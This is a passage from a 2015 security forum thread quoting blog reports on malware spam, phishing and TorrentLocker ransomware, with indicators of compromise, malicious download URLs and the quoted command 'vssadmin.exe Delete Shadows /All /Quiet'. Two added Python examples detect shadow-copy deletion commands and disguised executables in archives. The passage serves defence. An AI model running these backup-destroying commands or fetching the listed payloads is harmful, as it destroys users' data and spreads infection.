CNNOnly
TheCNNBreak
MyCNNNews
CNNHotline
All of the above started posting their links in the last few hours... Curiously, they all stopped posting their random mish-mash of memes and joke images around December 18 or 19, so it’s possible they could be formally parked bots which have taken on a new lease of life in some way. We’ve also seen non CNN-themed accounts sending out the same links. To give you an idea of click totals, the stats for two of the links we’ve seen are as follows:
bit(dot)ly/12NTPUP – 25,814 clicks
bit(dot)ly/1zxVKtB – 37,262 clicks
Worth noting that both of those links were created December 10, and as you now have to log into Bit.ly to see additional stats – and I can’t currently log in – we can’t comment on what percentage of those clicks are very recent. All the same, we shouldn’t look to keep clicking now and encourage -more- spam as a result. Twitter spam runs are one of those things which will never go away, and it pays to have an idea of the kind of antics* spammers get up to. If you’re looking for some advice on how to keep your Twitter account safe you may wish to look at the latter half of this post** while you’re at it..."
* https://blog.malwarebytes.org/?s=twitter+spam
** https://blog.malwarebytes.org/fraud-scam/2014/01/twitter-spam-rides-again-keeping-your-account-safe/
:fear: :mad: :fear:
AplusWebMaster
2015-01-12, 15:49
FYI...
Fake 'Summary Paid Against' SPAM - doc malware
- http://myonlinesecurity.co.uk/jason-bracegirdle-jps-projects-ltd-summary-paid-word-doc-malware/
12 Jan 2015 - "'Summary Paid Against' pretending to come from Jason Bracegirdle JPS Projects Ltd <jason.bracegirdle@ jpsprojectsltd .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains the same malware payload as today’s Invoice from 'simply carpets of Keynsham Ltd' - Word doc malware* although the file attachment has a different name...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Summary-Paid-Against.jpg
11 January 2015: Copy of Weekly Summary 28 12 2014 w.e 28.12.14.doc - Current Virus total detections: 3/54**
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-simply-carpets-keynsham-ltd-word-doc-malware/
** https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421063953/
- http://blog.dynamoo.com/2015/01/this-fake-finance-email-appears-to-be.html
12 Jan 2015
1] https://www.virustotal.com/en/file/07b3284bc17ea667c8239d402a70005150ab005508234f8f4c6e9b11698287c7/analysis/1421065786/
2] https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421065795/
> http://blog.dynamoo.com/2015/01/malware-spam-invoice-from-simply.html
12 Jan 2015
Recommended blocklist:
59.148.196.153
74.208.11.204 "
___
Outlook Settings Spam
- http://threattrack.tumblr.com/post/107897760068/outlook-settings-spam
Jan 12, 2015 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the downloaded instructions before updating settings.
campusnut .com/outlook/settings.html
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ Outlook-us.com and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.
Malicious URLs:
campusnut .com/outlook/settings.html
images .californiafamilyfitness.com/outlook/settings.html
data.gamin .cz/outlook/settings.html
capslik .com/outlook/settings.html
duedisnc .it/outlook/settings.html
cwvancouver .com/outlook/settings.html
eu1.panalinks .com/outlook/settings.html
indemnizaciongarantizada .com/outlook/settings.html
dprofessionals .org/outlook/settings.html
homewoodsuitestremblant .com/outlook/settings.html
ig4mbeco .com/outlook/settings.html
bestni .com/outlook/settings.html
boryapim .com/outlook/settings.html
hinchablessegarra .com/outlook/settings.html
bonificachiana .it/outlook/settings.html
Malicious File Name and MD5:
outlook_setting_pdf.exe (9F2018FC3C7DE300D1069460559659F4)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/16f8ee0bb94ce84727dff6d414dd3a33/tumblr_inline_ni2n28AfD81r6pupn.png
Tagged: Outlook, Upatre
- http://blog.dynamoo.com/2015/01/malware-spam-important-new-outlook.html
12 Jan 2015
... outlook_setting_pdf.exe
* https://www.virustotal.com/en/file/e4f76ca8fd1f708736bf5a47703099878e085e7b9b12ca98656428be1de284a5/analysis/1421077347/
"... Recommended blocklist:
202.153.35.133
morph-x .com
coffeeofthemonth .biz "
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
iPhone 6 SCAM
- https://blog.malwarebytes.org/fraud-scam/2015/01/iphone-6-scam-returns/
Jan 12, 2015 - "... a familiar -scam- on the verge of a come-back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/brad.png
... we first encountered the spammed link on LinkedIn, thanks to a user named Kolko Kolko, who according to his profile is a coach and has the face of an A-list celebrity. Doing a quick online search using the Goog.gl shortened URL brings up other domains—Google Plus, Livejournal, and Picasa, specifically — where the list is also being posted and shared. Once users click-the-link, they are directed to a survey -scam- page. Below is an example:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/survey.png
The above page is a type of survey that gives users the option to skip. Doing so, however, opens additional layers of survey pages that need skipping until such a point that users encounter a page they could not escape, such as this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/more-surveys.png
... the surveys vary depending on the user’s location... Should you encounter any posts from random users on sites you frequent with regard to claiming an iPhone 6, don’t click-the-link... warn friends and contacts on that site to avoid falling for it..."
___
Phish - Barclaycard Credit limit increase
- http://myonlinesecurity.co.uk/barclaycard-credit-limit-increase-phishing/
12 Jan 2015 - "'Credit limit increase' pretending to come from Barclaycard <barclaycard@ mail.barclaycard .co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. We are seeing a quite big run of this email today. We see these phishing emails frequently, but today’s spam run of them has a much larger number than usual. This one only wants your personal details, Barclaycard log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Credit-limit-increase-email.jpg
If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/barclaycard-Credit-limit-increase.jpg
When you fill in your user name and password you get a page where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. They then send you on to the genuine Barclaycard website..."
___
Google/Microsoft feud over latest 0-day disclosures
- http://www.infoworld.com/article/2867402/operating-systems/google-zero-day-disclosure-fuels-feud-with-microsoft.html
Jan 12, 2015 - "... The subject is the long-running feud between Google and Microsoft over the handling of zero-day flaws. Google engineer Tavis Ormandy has built quite a reputation in security circles for finding zero days in Windows and notifying Microsoft. If no action is forthcoming from Microsoft in a pre-determined amount of time (usually 90 days), Ormandy releases the details (presumably with Google's permission), typically on the Full Disclosure mailing list... The process is now formally supported by Google, under the name Project Zero*. There's no better way I know to get Microsoft's attention. The latest instances actually concern two zero-day bugs, both reported by a Google researcher known as Forshaw... Here's how the argument boils down, in my estimation. If you trust Microsoft to fix the holes in Windows, then Coordinated Vulnerability Disclosure - where we, as customers, trust Microsoft to dig in and fix problems as soon as they're discovered - is a great idea. We would trust Microsoft to fix the problems expeditiously, because other people may have discovered the problem already. We also trust Microsoft to put enough money into the patching effort to make the fixes appear quickly and accurately. If you don't trust Microsoft, then the question becomes how best to hold Microsoft's feet to the fire. Although some believe in full, immediate disclosure, I don't buy that. There has to be a better way. Google's approach seems to me a reasonable one - although it's arguable that the zero-day notification window should be extended to 120 days..."
* http://googleonlinesecurity.blogspot.fr/2014/07/announcing-project-zero.html
> http://blogs.technet.com/b/msrc/archive/2015/01/11/a-call-for-better-coordinated-vulnerability-disclosure.aspx
___
TorrentLocker -ransomware- hits ANZ Region
- http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-ransomware-hits-anz-region/
Jan 11, 2015 - "... the EMEA (Europe-Middle East-Africa) region experienced a surge in ransomware, specifically, crypto-ransomware attacks. It appears that these attacks are no longer limited to that region. Research from Trend Micro engineers shows that the ANZ (Australia-New Zealand) region is the latest to be greatly affected by this type of malware—this time by TorrentLocker ransomware. The Infection Chain:
Infection diagram for ANZ attacks:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/ANZ-cryp11.jpg
The malware arrives through -emails- that pretend to be penal notices from the New South Wales government (referred to in this entry as “NSW”) -or- shipping information from the Australia Post. Once users click-the-link, they will be -redirected- to a -spoofed- page bearing a newly-registered domain similar to the official, legitimate one. The page instructs users to download a file by first entering a CAPTCHA code. If correctly entered, it triggers the download of the malicious file in a zipped format from SendSpace, a file-hosting site. If the user -opens- the zipped file and executes the malware, it will connect to secure command-and-control (C&C) servers. After successful sending and receiving of information, the malware will then encrypt files in the users’ machines using Elliptic Curve Cryptography Encryption and appends the string .encrypted. Afterwards, it drops an .HTML file with decryption instructions and displays a ransom page. It also deletes the shadow copy of the infected system by executing the command line instruction vssadmin.exe Delete Shadows /All /Quiet, thus preventing the user from restoring their files from back-up. Based on feedback from the Smart Protection Network, 98.28% of the recipients are from Australia... ... we have identified several fake domains, 180 for Australia Post and 134 for NSW. These domains are hosted in the following Russian name servers, registered to certain email addresses:
91.218.228.XX
193.124.200.13X
193.124.205.18X
193.124.89.10X
The C&C servers in these attacks are newly registered and hosted under IP addresses ranging from 46.161.30.17 to 46.161.30.49. We have also identified eight domains, including adwordshelper[.]ru and countryregion[.]ru... Sample hashes of the files supported by our detections:
4d07581b5bdb3f93ff2721f2125f30e7d2769270
6a46ff02b1a075c967939851e90dfb36329876fa
9d71e27ad25dfe235dfaec99f6241673a6cff30e
a0bbbd2c75e059d54d217c2912b56b1cb447ef31
0ce7690a209796b530b89f3cac89c90626785b84
09d5bc847f60ce3892159f717548d30e46cd53f0
1816a65aa497877b8f656b87550110e04ac972cd
bee66ab8460ad41ba0589c4f46672c0f8c8419f8 ..."
(More detail at the trendmicro URL at the top of this post.)
:fear: :mad:
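The TorrentLocker write-up above singles out one step that is worth alerting on in its own right: the malware runs vssadmin.exe Delete Shadows /All /Quiet so that the victim cannot roll files back from Volume Shadow Copies, and it does so before the ransom page is shown, which makes it one of the few moments where a detection still saves data. The following is an added example, not code from the Trend Micro post, of detection logic run over process-creation telemetry: it parses key=value log lines, matches the command line against a small rule set, and rates a hit higher when the parent process lives in %TEMP%, as a freshly downloaded dropper would. SAMPLE_LOG is constructed here in a Sysmon-like layout whose field names are an assumption, and the rule list deliberately goes beyond the single command the post names to cover the sibling ways of purging shadow copies (wmic, the WMI class from PowerShell, vssadmin resize, bcdedit recovery off).

```python
"""Flag shadow-copy deletion in process-creation telemetry: the
'vssadmin.exe Delete Shadows /All /Quiet' step TorrentLocker runs so that
victims cannot restore from Volume Shadow Copies. Added example, not code from
the Trend Micro post; SAMPLE_LOG is constructed here in a Sysmon-like
key=value layout (field names are an assumption), and the rule list covers
sibling commands beyond the single one the post names.
"""
import re

RULES = [
    ("vssadmin-delete-shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("vssadmin-resize-shadowstorage",          # shrinking storage purges copies quietly
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\b.*\bshadowstorage\b", re.I)),
    ("wmic-shadowcopy-delete",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("powershell-win32-shadowcopy",
     re.compile(r"win32_shadowcopy.*\.delete\(", re.I)),
    ("bcdedit-recovery-off",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
]
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
TEMP_DIR = "\\appdata\\local\\temp\\"


def parse_line(line):
    """key=value fields; quoted values keep their spaces, quotes are stripped."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def match_rules(command_line):
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(lines):
    """One finding per process-creation line that matches a rule."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        hits = match_rules(ev.get("CommandLine", ""))
        if not hits:
            continue
        parent = ev.get("ParentImage", "")
        findings.append({
            "time": line.split(" ", 1)[0],
            "rules": hits,
            "user": ev.get("User"),
            "parent": parent,
            # Shadow deletion spawned by a binary in %TEMP% is the ransomware
            # pattern; from an administrator's shell it may be housekeeping.
            "severity": "high" if TEMP_DIR in parent.lower() else "medium",
        })
    return findings


# Constructed telemetry: one TorrentLocker-style sequence plus benign noise.
SAMPLE_LOG = r"""
2015-01-11T10:02:13Z EventID=1 Image=C:\Windows\System32\vssadmin.exe ParentImage=C:\Users\bob\AppData\Local\Temp\rzqiw.exe CommandLine="vssadmin.exe Delete Shadows /All /Quiet" User=CORP\bob
2015-01-11T10:02:14Z EventID=1 Image=C:\Windows\System32\vssadmin.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="vssadmin.exe list shadows" User=CORP\admin
2015-01-11T10:05:40Z EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe ParentImage=C:\Users\bob\AppData\Local\Temp\rzqiw.exe CommandLine="wmic shadowcopy delete" User=CORP\bob
2015-01-11T10:06:02Z EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell -c Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}" User=CORP\bob
2015-01-11T10:07:11Z EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine="notepad.exe DECRYPT_INSTRUCTIONS.html" User=CORP\bob
""".strip().splitlines()
```

`scan(SAMPLE_LOG)` yields three findings (the vssadmin delete, the wmic delete and the PowerShell WMI delete) and ignores the administrator's `vssadmin.exe list shadows`; the two spawned from the %TEMP% binary are rated high. In production the same rules belong in the EDR or SIEM query language, and the parent-path heuristic should be widened to Downloads, the browser cache and Office's temporary-file directories, which is where the macro droppers in the runs above write their payloads.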
AplusWebMaster
2015-01-13, 16:24
FYI...
Fake 'Nat West Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nat-west-new-secure-message-fake-pdf-malware/
13 Jan 2015 - "'You have a new Secure Message' pretending to come from NatWest <secure.message@ natwest .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2313.
13 January 2015: SecureMessage.pdf.zip: Extracts to: SecureMessage.pdf.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b8ea8bbd91995f7a9e1c5f6aaf8fa098940c40f025d20d4b00e34bb8839e288/analysis/1421155786/
___
Fake 'Tax return' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-johnsmithmail-irsgov-your.html
13 Jan 2015 - "This -fake- tax return spam leads to malware:
From: John Smith [mailto:john.smith@ mail-irs .gov]
Sent: 13 January 2015 11:13
Subject: Your tax return was incorrectly filled out
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing the last tax form application (ID: 960164707883) .
Please follow the advice of our tax specialists HERE
Please amend the mistakes and send the corrected tax return to your tax agent as soon as possible.
Yours sincerely
The link in the email has a format such as:
http ://marypageevans .com/taxadmin/get_doc.html
http ://laser-support .co.uk/taxadmin/get_doc.html
A journey through some heavily obfuscated javascript follows... which eventually leads to a download called message.zip which contains a malicious executable tax_guide_pdf.exe which changes slightly every time it is downloaded. Incidentally, there seems to be a download limit of about 6 times, after which nonsense text is displayed instead. The .exe file has a VirusTotal detection rate of just 2/57* and Norman identifies it as Upatre. According to the Malwr report it connects to the following URLs:
http ://202.153.35.133 :19639/1301us23/HOME/0/51-SP3/0/
http ://202.153.35.133 :19639/1301us23/HOME/1/0/0/
http ://dstkom .com/mandoc/lit23.pdf
http ://202.153.35.133 :19657/1301us23/HOME/41/7/4/
It also drops a file (in this case called FbIpg60.exe) which has another low detection rate of just 2/57**. Fake IRS spam is quite common, if you don't deal with the IRS then blocking mail-irs .gov on your email gateway might help."
* https://www.virustotal.com/en/file/bd3147d1a6a06a59dc2362229a642a4de11fb0d49525b4333208530716bfe139/analysis/1421160583/
** https://www.virustotal.com/en/file/9cb95959bec83625a6cd9e2dd7d2261bc5715efb28124e600d9db357ea3912dc/analysis/1421161232/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Win7 - End of mainstream support
- http://windowssecrets.com/top-story/win7-reaches-milestone-prepare-for-its-demise/
Jan 8, 2015 - "... Most major Microsoft products have a formal life cycle that includes two key end-of-life dates. For Windows, those dates are listed on Microsoft’s “Windows lifecycle fact sheet” webpage.* The first date — End of mainstream support — effectively means that Microsoft will no longer offer free updates to the operating system. Once mainstream support ends for a specific version of Windows, it then enters its Extended support phase, during which Microsoft offers only essential fixes and security updates. (Companies can also pay for specific nonsecurity updates.) When an OS reaches its End of extended support milestone, all official support ends. Windows XP, as many Windows Secrets readers know, passed its “End of extended support” date on April 8, 2014. It has not had official updates of any kind since. (For more specifics on MS product life cycles, see the online “Microsoft support lifecycle policy FAQ.”) As noted in the “Windows lifecycle fact sheet,” Jan. 13 marks the end of mainstream support for all versions of Windows 7 SP1. What does that mean for the millions of us doing our daily computing on Win7 systems? Very soon, our operating systems will be essentially frozen — we’ll no longer receive any enhancements or nonessential fixes. We will, however, receive monthly security updates until Jan. 14, 2020, Win7’s official “End of extended support” date (at which point, Microsoft will want us on Windows 13 — or whatever it’s then called). Just as with XP this past April, Win7 systems should no longer receive updates of any kind after January 2020..."
* http://windows.microsoft.com/en-us/windows/lifecycle
- http://www.theinquirer.net/inquirer/news/2390045/microsoft-ends-mainstream-support-for-windows-7
Jan 13 2015
:fear: :mad:
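The NatWest post above describes the trick that the zipped Upatre droppers in this thread rely on: SecureMessage.pdf.zip extracts to SecureMessage.pdf.scr, and with Explorer's "hide extensions for known file types" default the name shows as SecureMessage.pdf next to a PDF icon. The following is an added example, not code from the quoted blogs, of the check a mail gateway or sandbox can apply before a user ever sees the icon: open the archive, flag members whose final extension is executable (with a document-looking extension in front of it), and, independently of the name, flag members whose first bytes are a DOS/PE header. The archive is built in memory here from a constructed MZ/PE stub, nothing is real malware, and the extension lists are this example's own choice; the bidi-override check goes one step beyond the post, since the same disguise is also done with a Unicode right-to-left override character in the name.

```python
"""Flag archive members whose name says 'document' but whose bytes say
'executable', the SecureMessage.pdf.scr pattern in the NatWest post. Added
example, not code from the quoted blogs; the archive is built in memory from a
constructed MZ/PE stub, and the extension lists are this example's own choice.
"""
import io
import struct
import zipfile

EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "cpl", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png", "htm", "html"}


def looks_like_pe(data):
    """MZ at offset 0 and e_lfanew (offset 0x3c) pointing at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def name_verdict(member_name):
    """Reasons the name alone is suspicious, independent of the content."""
    base = member_name.rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    reasons = []
    if len(parts) >= 2 and parts[-1] in EXECUTABLE_EXTS:
        reasons.append("executable-extension")
        if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
            # Explorer with "hide extensions for known file types" shows
            # 'SecureMessage.pdf.scr' as 'SecureMessage.pdf'.
            reasons.append("double-extension")
    if "\u202e" in base or "\u202d" in base:
        # Right-to-left override makes 'invoice\u202efdp.scr' render as 'invoicercs.pdf'.
        reasons.append("bidi-override")
    return reasons


def scan_zip(blob):
    """Return findings for every member that trips a name or content check."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4096)           # enough for the DOS and PE headers
            reasons = name_verdict(info.filename)
            if looks_like_pe(head):
                reasons.append("pe-content")   # catches a plain rename to .pdf as well
            if reasons:
                findings.append({"member": info.filename, "size": info.file_size,
                                 "reasons": reasons})
    return findings


def build_pe_stub():
    """Smallest blob looks_like_pe accepts: DOS header, e_lfanew=0x40, 'PE\\0\\0'."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


def build_sample_zip():
    """Constructed attachment: one disguised executable and one harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("SecureMessage.pdf.scr", build_pe_stub())
        zf.writestr("readme.txt", b"constructed benign text\n")
    return buf.getvalue()
```

`scan_zip(build_sample_zip())` returns a single finding for SecureMessage.pdf.scr with all three reasons; readme.txt passes. The content check matters more than the name check: the same Upatre samples have also been mailed as message.zip with a plain .exe inside, and a renamed executable with no double extension would only be caught by the MZ/PE test. On the endpoint side, the post's advice to enable "show known file extensions" removes the illusion but not the risk, so a gateway rule that rejects executables inside archives is the stronger control.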
AplusWebMaster
2015-01-14, 13:59
FYI...
Fake 'Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/les-mills-invoice-word-doc-malware/
14 Jan 2015 - "'Les Mills Invoice' pretending to come from lmuk.accounts@ lesmills .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... As usual 2 slightly different -malware- versions. The email looks like:
Dear Customer,
Please find attached an invoice for Les Mills goods/services. Please note that for Licence Fee invoices the month being billed is the month in which the invoice has been raised unless otherwise stated within.
If you have any queries please email lmuk.accounts@ lesmills .com or call 0207 264 0200 and select option 3 to speak to a member of the team.
Best regards,
Les Mills Finance Team
14 January 2015 : Les Mills SIV035931.doc - Current Virus total detections: 0/57* : 0/55**
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3dbc665b89a7a99de58614e905d4fa6105194e6d46d6d36f6756867bcd596564/analysis/
** https://www.virustotal.com/en/file/328929f0fbfa8c28e234741138e2e48a8ab5992d36e5eaaf62017abc57f47b11/analysis/1421225265/
- http://blog.dynamoo.com/2015/01/malware-spam-les-mills-invoice.html
14 Jan 2015
"... Recommended blocklist:
59.148.196.153
74.208.11.204
81.27.38.97
okurimono.ina-ka .com "
___
Fake 'SEPA' SPAM – doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-sepa-remittance-advice-word-doc-malware/
14 Jan 2015 - "'Senior Accounts Payable SEPA REMITTANCE ADVICE 2503.62 EUR 12 JAN 2014' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good Afternoon
Please see attached a copy of remittance advice for SEPA payment of 2503.62 EUR made on 12/01/2015
Regards,
Victoria Mack
Senior Accounts Payable
14 January 2015 : SE827QR.doc - Current Virus total detections: 0/57*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/647d4115b9a7a77076ec268a480cf898d18433929664200e1b336ecfdc357fcd/analysis/1421236177/
___
Fake Fax SPAM - PDF malware
- http://myonlinesecurity.co.uk/nextiva-vfax-fake-pdf-malware/
14 Jan 2015 - "'Fax Received: Fax Server | 1/14/2015 8:21 AM' pretending to come from Nextiva vFax <notifications@ nextivafax .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HI ...
Delivery Information:
Message #: 131177970
Local Number: 4853872678
Remote CSID: Fax Server
Total Pages: 2
Transmit Time: 3 min 41.000 sec
Click here to view this message ...
Delivered by vFax… “When Every Fax is Mission Critical”
14 January 2015: fax_message_01142015_784398443.pdf.zip ( 83kb): Extracts to: fax_message_01142015_784398443.pdf.scr - Current Virus total detections: 3/55*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/dbc7a917aa4137ef6ef6b3d169b92e6100f44079ca07f79067469f871beffdd5/analysis/1421251998/
___
Malware sites offering Oracle 'patches'
- https://blogs.oracle.com/proactivesupportDI/entry/malware_sites_offering_oracle_patches
Jan 14, 2015 - "It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages... If you do encounter one of these sites please inform us immediately via Communities* or create a SR and we will rectify the situation... Proactive Support are already investigating some known sites..."
* https://community.oracle.com/
___
Outlook Phish
- https://blog.malwarebytes.org/fraud-scam/2015/01/avoid-this-outlook-phish/
Jan 14, 2015 - "... phish mail in circulation... for Outlook accounts. The email reads as follows:
Dear Microsoft User,
Please note we have temporary blocked your account from receiving e-mails, because we detected fraudulent and spam activities from your mail box to some blacklisted email address, So for your own safety verify your account.
If a verification respond is not gotten from you in the next 24 hours, we are sorry we will be forced to permanently disable and delete your account from Microsoft Account.
To verify your Microsoft account, Click Here
We regret Any inconvenience.
Thanks,
The Microsoft account team
Clicking the link in the email – sbmarticles(dot)com/Z-zone/SigrypAmt2nd(dot)htm*, which has already popped up on Phishtank – takes potential victims to a spot of data URI phishing**.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/uriphish1-300x186.jpg
Don’t be tricked into filling in login details via these types of attack – any email asking you to login or enter personal information (especially when warning you about account suspensions, unusual activity or any other form of shenanigans) should be treated with a generous helping of caution."
* 192.190.80.53: https://www.virustotal.com/en/ip-address/192.190.80.53/information/
** http://www.csoonline.com/article/2154202/social-engineering/phishing-attack-using-data-uris-to-target-google-accounts.html
:fear::fear: :mad:
AplusWebMaster
2015-01-15, 15:32
FYI...
Fake 'invoice' SPAM - malware attached
- http://blog.dynamoo.com/2015/01/malware-spam-hexis-uk-limited-invoice.html
15 Jan 2015 - "This -fake- invoice has a malicious attachment. It does not come from Hexis UK Ltd, it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.
From: Invoice from Hexis [Invoice@ hexis .co.uk]
Date: 15 January 2015 at 06:36
Subject: Invoice
Sent 15 JAN 15 08:30
HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ
Telephone 01543 411221
Fax 01543 411246
Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in -two- different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros... which download a component from one of the following locations:
http ://dramakazuki.kesagiri .net/js/bin.exe
http ://cassiope .cz/js/bin.exe
This has a VirusTotal detection rate of 3/57*. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:
59.148.196.153
74.208.11.204
81.27.38.97
UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57**."
1] https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421314924/
2] https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421314937/
* https://www.virustotal.com/en/file/87f639a395dc72d9fa2aa517ec2776ee3c9e9c2fa71ba50d832e0ff012373b22/analysis/1421315774/
** https://www.virustotal.com/en/file/105fe9735add6aec937c9e6f611d512511c050895fd863a216d25980c54fad45/analysis/1421318457/
- http://myonlinesecurity.co.uk/hexis-uk-limited-invoice-word-doc-malware/
15 Jan 2015
* https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421309107/
** https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421309412/
___
Fake 'Payment request' SPAM - malware attachments
- http://blog.dynamoo.com/2015/01/malware-spam-payment-request-of-417694.html
15 Jan 2015 - "This -spam- comes with a malicious Word document attached:
from: Alan Case
date: 15 January 2015 at 08:49
subject: Payment request of 4176.94 (14 JAN 2015)
Dear Sirs,
Sub: Remitance of GBP 4176.94
This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.
Thanking you,
Alan Case Remittance Manager
Other names and job titles seen... The payment amount, name and job title change in each spam, as does the name of the attachment (although this follows the format ADV0000XX). There are three malicious Word documents that I have seen, each with a low detection rate at VirusTotal [1] [2] [3] which in turn contain a slightly different macro... which attempt to download another component from one of the following locations:
